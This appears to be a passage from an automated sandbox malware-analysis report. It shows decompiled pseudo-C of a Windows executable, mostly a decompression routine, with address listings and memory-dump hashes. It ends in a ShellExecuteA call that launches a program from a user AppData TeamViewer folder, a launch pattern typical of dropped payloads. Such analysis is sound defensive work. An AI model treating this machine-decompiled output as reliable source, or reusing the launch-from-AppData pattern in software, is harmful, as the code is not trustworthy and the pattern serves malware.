                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t484 = __ebp - 0x70;
                                                                                                                        											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t484;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L148:
                                                                                                                        											_t487 = __ebp - 0x48;
                                                                                                                        											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        											__eflags =  *_t487;
                                                                                                                        											L149:
                                                                                                                        											__eflags =  *(__ebp - 0x48);
                                                                                                                        											if( *(__ebp - 0x48) <= 0) {
                                                                                                                        												__ecx =  *(__ebp - 0x40);
                                                                                                                        												__ebx =  *(__ebp - 0x50);
                                                                                                                        												0 = 1;
                                                                                                                        												__eax = 1 << __cl;
                                                                                                                        												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        												__eax =  *(__ebp - 0x7c);
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												while(1) {
                                                                                                                        													 *(_t613 - 0x88) = _t533;
                                                                                                                        													goto L1;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x50);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        											__eax =  *(__ebp - 0x58);
                                                                                                                        											__esi = __edx + __eax;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											__edi = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eax = __eax - __ecx;
                                                                                                                        												__edx = __edx + 1;
                                                                                                                        												__eflags = __edx;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        												 *(__ebp - 0x50) = __edx;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edi;
                                                                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L148;
                                                                                                                        											} else {
                                                                                                                        												goto L146;
                                                                                                                        											}
                                                                                                                        										case 0x19:
                                                                                                                        											__eflags = __ebx - 4;
                                                                                                                        											if(__ebx < 4) {
                                                                                                                        												 *(__ebp - 0x2c) = __ebx;
                                                                                                                        												L119:
                                                                                                                        												_t393 = __ebp - 0x2c;
                                                                                                                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        												__eflags =  *_t393;
                                                                                                                        												L120:
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax == 0) {
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        												__eax =  *(__ebp - 0x30);
                                                                                                                        												_t400 = __ebp - 0x60;
                                                                                                                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        												__eflags =  *_t400;
                                                                                                                        												goto L123;
                                                                                                                        											}
                                                                                                                        											__ecx = __ebx;
                                                                                                                        											__eax = __ebx;
                                                                                                                        											__ecx = __ebx >> 1;
                                                                                                                        											__eax = __ebx & 0x00000001;
                                                                                                                        											__ecx = (__ebx >> 1) - 1;
                                                                                                                        											__al = __al | 0x00000002;
                                                                                                                        											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        											__eflags = __ebx - 0xe;
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											if(__ebx >= 0xe) {
                                                                                                                        												__ebx = 0;
                                                                                                                        												 *(__ebp - 0x48) = __ecx;
                                                                                                                        												L102:
                                                                                                                        												__eflags =  *(__ebp - 0x48);
                                                                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                                                                        													__eax = __eax + __ebx;
                                                                                                                        													 *(__ebp - 0x40) = 4;
                                                                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													L108:
                                                                                                                        													__ebx = 0;
                                                                                                                        													 *(__ebp - 0x58) = __eax;
                                                                                                                        													 *(__ebp - 0x50) = 1;
                                                                                                                        													 *(__ebp - 0x44) = 0;
                                                                                                                        													 *(__ebp - 0x48) = 0;
                                                                                                                        													L112:
                                                                                                                        													__eax =  *(__ebp - 0x40);
                                                                                                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        														_t391 = __ebp - 0x2c;
                                                                                                                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        														__eflags =  *_t391;
                                                                                                                        														goto L119;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x50);
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													__esi = __edi + __eax;
                                                                                                                        													 *(__ebp - 0x54) = __esi;
                                                                                                                        													__ax =  *__esi;
                                                                                                                        													__ecx = __ax & 0x0000ffff;
                                                                                                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        														__ecx = 0;
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        														__ecx = 1;
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        														__ebx = 1;
                                                                                                                        														__ecx =  *(__ebp - 0x48);
                                                                                                                        														__ebx = 1 << __cl;
                                                                                                                        														__ecx = 1 << __cl;
                                                                                                                        														__ebx =  *(__ebp - 0x44);
                                                                                                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        														__cx = __ax;
                                                                                                                        														__cx = __ax >> 5;
                                                                                                                        														__eax = __eax - __ecx;
                                                                                                                        														__edi = __edi + 1;
                                                                                                                        														__eflags = __edi;
                                                                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                                                                        														 *__esi = __ax;
                                                                                                                        														 *(__ebp - 0x50) = __edi;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x10) = __edx;
                                                                                                                        														0x800 = 0x800 - __ecx;
                                                                                                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        														 *__esi = __dx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														L111:
                                                                                                                        														_t368 = __ebp - 0x48;
                                                                                                                        														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        														__eflags =  *_t368;
                                                                                                                        														goto L112;
                                                                                                                        													} else {
                                                                                                                        														goto L109;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        													__ecx =  *(__ebp - 0x10);
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        													__ebx = __ebx | 0x00000001;
                                                                                                                        													__eflags = __ebx;
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													L101:
                                                                                                                        													_t338 = __ebp - 0x48;
                                                                                                                        													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        													__eflags =  *_t338;
                                                                                                                        													goto L102;
                                                                                                                        												} else {
                                                                                                                        													goto L99;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__edx =  *(__ebp - 4);
                                                                                                                        											__eax = __eax - __ebx;
                                                                                                                        											 *(__ebp - 0x40) = __ecx;
                                                                                                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        											goto L108;
                                                                                                                        										case 0x1a:
                                                                                                                        											L56:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x1a;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x68);
                                                                                                                        											__al =  *(__ebp - 0x5c);
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        											 *( *(__ebp - 0x68)) = __al;
                                                                                                                        											__ecx =  *(__ebp - 0x14);
                                                                                                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        											__eax = __ecx + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t192;
                                                                                                                        											goto L79;
                                                                                                                        										case 0x1b:
                                                                                                                        											L75:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x1b;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        												__eflags = __eax;
                                                                                                                        											}
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											__cl =  *(__eax + __edx);
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											 *(__ebp - 0x5c) = __cl;
                                                                                                                        											 *(__eax + __edx) = __cl;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t274;
                                                                                                                        											__eax =  *(__ebp - 0x68);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											_t283 = __ebp - 0x64;
                                                                                                                        											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                        											__eflags =  *_t283;
                                                                                                                        											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        											L79:
                                                                                                                        											 *(__ebp - 0x14) = __edx;
                                                                                                                        											goto L80;
                                                                                                                        										case 0x1c:
                                                                                                                        											while(1) {
                                                                                                                        												L123:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												__cl =  *(__eax + __edx);
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                                                                        												 *(__eax + __edx) = __cl;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t414;
                                                                                                                        												__eax =  *(__ebp - 0x68);
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        												__eflags =  *(__ebp - 0x30);
                                                                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        												 *(__ebp - 0x14) = _t414;
                                                                                                                        												if( *(__ebp - 0x30) > 0) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													L80:
                                                                                                                        													 *(__ebp - 0x88) = 2;
                                                                                                                        													goto L1;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											 *(__ebp - 0x88) = 0x1c;
                                                                                                                        											goto L170;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								L171:
                                                                                                                        								_t535 = _t534 | 0xffffffff;
                                                                                                                        								goto L172;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040647d
                                                                                                                        0x00406481
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406487
                                                                                                                        0x0040648b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406491
                                                                                                                        0x00406493
                                                                                                                        0x00406497
                                                                                                                        0x00406497
                                                                                                                        0x0040649a
                                                                                                                        0x0040649e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406515
                                                                                                                        0x00406519
                                                                                                                        0x00406520
                                                                                                                        0x00406523
                                                                                                                        0x00406526
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x00406529
                                                                                                                        0x0040652c
                                                                                                                        0x0040652f
                                                                                                                        0x0040652f
                                                                                                                        0x00406532
                                                                                                                        0x00406535
                                                                                                                        0x00406538
                                                                                                                        0x00406538
                                                                                                                        0x0040653b
                                                                                                                        0x00406542
                                                                                                                        0x00406547
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004065d5
                                                                                                                        0x004065d5
                                                                                                                        0x004065d9
                                                                                                                        0x00406977
                                                                                                                        0x00000000
                                                                                                                        0x00406977
                                                                                                                        0x004065df
                                                                                                                        0x004065e2
                                                                                                                        0x004065e5
                                                                                                                        0x004065e9
                                                                                                                        0x004065ec
                                                                                                                        0x004065f2
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f7
                                                                                                                        0x004065fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061ca
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x00000000
                                                                                                                        0x0040693b
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f2
                                                                                                                        0x004061f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061fb
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                        • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                                        • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                        • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 79%
                                                                                                                        			E00401DC1() {
                                                                                                                        				char* _t6;
                                                                                                                        				void* _t16;
                                                                                                                        				void* _t19;
                                                                                                                        				void* _t26;
                                                                                                                        
                                                                                                                        				_t24 = E004029F6(_t19);
                                                                                                                        				_t6 = E004029F6(0x31);
                                                                                                                        				_t22 = E004029F6(0x22);
                                                                                                                        				E004029F6(0x15);
                                                                                                                        				E00401423(0xffffffec);
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				_t16 = ShellExecuteA( *(_t26 - 0x34),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer",  *(_t26 - 0x18)); // executed
